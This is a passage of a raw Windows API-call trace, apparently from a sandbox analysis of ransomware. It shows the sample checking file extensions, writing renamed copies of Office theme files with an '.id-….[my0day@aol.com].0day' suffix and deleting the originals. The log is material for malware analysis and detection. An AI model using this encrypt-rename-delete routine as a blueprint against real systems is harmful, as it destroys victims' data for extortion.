(lpString=".jpg") returned 4 [0272.033] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0272.033] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0272.033] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0272.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe" (normalized: "c:\\program files\\microsoft office\\discipline-netherlands-sail.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.034] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=75776) returned 1 [0272.034] CloseHandle (hObject=0x394) returned 1 [0272.034] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe" (normalized: "c:\\program files\\microsoft office\\discipline-netherlands-sail.exe")) returned 0x20 [0272.034] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\discipline-netherlands-sail.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe" (normalized: "c:\\program files\\microsoft office\\discipline-netherlands-sail.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.035] lstrlenW (lpString=".doc") returned 4 [0272.035] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0272.035] lstrlenW (lpString=".docx") returned 5 [0272.035] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0272.035] lstrlenW (lpString=".pdf") returned 4 [0272.035] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0272.035] lstrlenW (lpString=".xls") returned 4 [0272.035] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0272.035] lstrlenW (lpString=".xlsx") returned 5 [0272.035] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0272.035] lstrlenW (lpString=".ppt") returned 4 [0272.035] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0272.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.035] lstrlenW (lpString=".zip") returned 4 [0272.035] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0272.035] lstrlenW (lpString=".rar") returned 4 [0272.035] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0272.035] lstrlenW (lpString=".bz2") returned 4 [0272.035] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0272.035] lstrlenW (lpString=".7z") returned 3 [0272.035] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0272.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.035] lstrlenW (lpString=".dbf") returned 4 [0272.035] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0272.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.036] lstrlenW (lpString=".1cd") returned 4 [0272.036] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0272.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.036] lstrlenW (lpString=".jpg") returned 4 [0272.036] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0272.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.036] lstrlenW (lpString=".doc") returned 4 [0272.036] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0272.036] lstrlenW (lpString=".docx") returned 5 [0272.036] lstrcmpiW (lpString1=".docx", lpString2="l.exe") returned -1 [0272.036] lstrlenW (lpString=".pdf") returned 4 [0272.036] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0272.036] lstrlenW (lpString=".xls") returned 4 [0272.036] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0272.036] lstrlenW (lpString=".xlsx") returned 5 [0272.036] lstrcmpiW (lpString1=".xlsx", lpString2="l.exe") returned -1 [0272.036] lstrlenW (lpString=".ppt") returned 4 [0272.036] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0272.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.037] lstrlenW (lpString=".zip") returned 4 [0272.037] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0272.037] lstrlenW (lpString=".rar") returned 4 [0272.037] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0272.037] lstrlenW (lpString=".bz2") returned 4 [0272.037] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0272.037] lstrlenW (lpString=".7z") returned 3 [0272.037] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0272.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.037] lstrlenW (lpString=".dbf") returned 4 [0272.037] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0272.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.037] lstrlenW (lpString=".1cd") returned 4 [0272.037] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0272.037] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\discipline-netherlands-sail.exe") returned 65 [0272.037] lstrlenW (lpString=".jpg") returned 4 [0272.037] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0272.037] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.037] lstrlenW (lpString="Adjacency.eftx") returned 14 [0272.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.194] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=21089) returned 1 [0272.195] CloseHandle (hObject=0x380) returned 1 [0272.195] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx")) returned 0x20 [0272.399] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.477] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0272.480] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.480] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.516] GetLastError () returned 0x0 [0272.516] ReadFile (in: hFile=0x1fc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x5261, lpOverlapped=0x0) returned 1 [0272.520] WriteFile (in: hFile=0x3a8, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x5270, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x5270, lpOverlapped=0x0) returned 1 [0272.521] ReadFile (in: hFile=0x1fc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.521] WriteFile (in: hFile=0x3a8, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0272.521] SetEndOfFile (hFile=0x3a8) returned 1 [0272.521] CloseHandle (hObject=0x3a8) returned 1 [0272.521] SetFilePointerEx (in: hFile=0x1fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.521] SetEndOfFile (hFile=0x1fc) returned 1 [0272.525] CloseHandle (hObject=0x1fc) returned 1 [0272.525] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.528] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\adjacency.eftx")) returned 1 [0272.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.528] lstrlenW (lpString=".doc") returned 4 [0272.528] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString=".docx") returned 5 [0272.529] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.529] lstrlenW (lpString=".pdf") returned 4 [0272.529] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString=".xls") returned 4 [0272.529] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString=".xlsx") returned 5 [0272.529] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.529] lstrlenW (lpString=".ppt") returned 4 [0272.529] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.529] lstrlenW (lpString=".zip") returned 4 [0272.529] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString=".rar") returned 4 [0272.529] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString=".bz2") returned 4 [0272.529] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString=".7z") returned 3 [0272.529] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.529] lstrlenW (lpString=".dbf") returned 4 [0272.529] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.529] lstrlenW (lpString=".1cd") returned 4 [0272.529] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.529] lstrlenW (lpString=".jpg") returned 4 [0272.529] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.529] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.529] lstrlenW (lpString=".doc") returned 4 [0272.529] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.530] lstrlenW (lpString=".docx") returned 5 [0272.530] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.530] lstrlenW (lpString=".pdf") returned 4 [0272.530] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.530] lstrlenW (lpString=".xls") returned 4 [0272.530] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.530] lstrlenW (lpString=".xlsx") returned 5 [0272.530] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.530] lstrlenW (lpString=".ppt") returned 4 [0272.530] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.530] lstrlenW (lpString=".zip") returned 4 [0272.530] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.530] lstrlenW (lpString=".rar") returned 4 [0272.530] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.530] lstrlenW (lpString=".bz2") returned 4 [0272.530] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.530] lstrlenW (lpString=".7z") returned 3 [0272.530] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.530] lstrlenW (lpString=".dbf") returned 4 [0272.530] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.530] lstrlenW (lpString=".1cd") returned 4 [0272.530] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.530] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Adjacency.eftx") returned 81 [0272.530] lstrlenW (lpString=".jpg") returned 4 [0272.530] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.530] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.530] lstrlenW (lpString="Civic.eftx") returned 10 [0272.531] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0272.542] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=42917) returned 1 [0272.542] CloseHandle (hObject=0x2cc) returned 1 [0272.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx")) returned 0x20 [0272.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0272.543] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.543] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.543] GetLastError () returned 0x0 [0272.543] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0xa7a5, lpOverlapped=0x0) returned 1 [0272.555] WriteFile (in: hFile=0x388, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xa7b0, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xa7b0, lpOverlapped=0x0) returned 1 [0272.556] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.556] WriteFile (in: hFile=0x388, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0272.556] SetEndOfFile (hFile=0x388) returned 1 [0272.557] CloseHandle (hObject=0x388) returned 1 [0272.557] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.557] SetEndOfFile (hFile=0x2cc) returned 1 [0272.562] CloseHandle (hObject=0x2cc) returned 1 [0272.562] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.562] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx")) returned 1 [0272.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.562] lstrlenW (lpString=".doc") returned 4 [0272.562] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.562] lstrlenW (lpString=".docx") returned 5 [0272.562] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.562] lstrlenW (lpString=".pdf") returned 4 [0272.562] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.562] lstrlenW (lpString=".xls") returned 4 [0272.562] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.562] lstrlenW (lpString=".xlsx") returned 5 [0272.562] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.562] lstrlenW (lpString=".ppt") returned 4 [0272.562] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.563] lstrlenW (lpString=".zip") returned 4 [0272.563] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString=".rar") returned 4 [0272.563] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString=".bz2") returned 4 [0272.563] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString=".7z") returned 3 [0272.563] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.563] lstrlenW (lpString=".dbf") returned 4 [0272.563] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.563] lstrlenW (lpString=".1cd") returned 4 [0272.563] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.563] lstrlenW (lpString=".jpg") returned 4 [0272.563] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.563] lstrlenW (lpString=".doc") returned 4 [0272.563] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString=".docx") returned 5 [0272.563] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.563] lstrlenW (lpString=".pdf") returned 4 [0272.563] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString=".xls") returned 4 [0272.563] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.563] lstrlenW (lpString=".xlsx") returned 5 [0272.563] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.563] lstrlenW (lpString=".ppt") returned 4 [0272.563] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.564] lstrlenW (lpString=".zip") returned 4 [0272.564] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.564] lstrlenW (lpString=".rar") returned 4 [0272.564] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.564] lstrlenW (lpString=".bz2") returned 4 [0272.564] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.564] lstrlenW (lpString=".7z") returned 3 [0272.564] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.564] lstrlenW (lpString=".dbf") returned 4 [0272.564] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.564] lstrlenW (lpString=".1cd") returned 4 [0272.564] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx") returned 77 [0272.564] lstrlenW (lpString=".jpg") returned 4 [0272.564] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.564] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.564] lstrlenW (lpString="Clarity.eftx") returned 12 [0272.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0272.565] GetFileSizeEx (in: hFile=0x2cc, lpFileSize=0x3b9ff1c | out: lpFileSize=0x3b9ff1c*=32818) returned 1 [0272.565] CloseHandle (hObject=0x2cc) returned 1 [0272.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx")) returned 0x20 [0272.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0272.569] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.569] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0272.569] GetLastError () returned 0x0 [0272.569] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x8032, lpOverlapped=0x0) returned 1 [0272.572] WriteFile (in: hFile=0x378, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0x8040, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0x8040, lpOverlapped=0x0) returned 1 [0272.573] ReadFile (in: hFile=0x2cc, lpBuffer=0x43f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fed4, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesRead=0x3b9fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.574] WriteFile (in: hFile=0x378, lpBuffer=0x43f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43f0020*, lpNumberOfBytesWritten=0x3b9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.574] SetEndOfFile (hFile=0x378) returned 1 [0272.574] CloseHandle (hObject=0x378) returned 1 [0272.574] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.574] 